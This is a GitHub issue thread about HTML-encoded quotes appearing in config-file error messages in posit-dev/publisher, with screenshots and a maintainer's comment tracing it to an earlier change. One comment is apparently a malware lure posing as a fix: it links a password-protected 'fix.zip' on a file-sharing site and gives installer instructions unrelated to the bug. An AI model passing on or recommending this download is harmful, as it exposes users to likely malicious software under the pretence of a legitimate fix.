### ISSUE TITLE
 HTML encoded quotes are displayed in the error text when Config file is invalid

### ISSUE THREAD

**Issue by kgartland-rstudio** [posit-dev/publisher#2176]
When creating an invalid config, the quotes are displaying as HTML encoded in the error messages:

![config-type-error](https://github.com/user-attachments/assets/b4d052d9-8515-4fd4-b125-06ce675d4eda)

![unknown-key](https://github.com/user-attachments/assets/a5e2a960-8ffb-46eb-84d7-cadd7a64ac70)

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mmarchetti** [comment]
This looks like fallout from #2152.
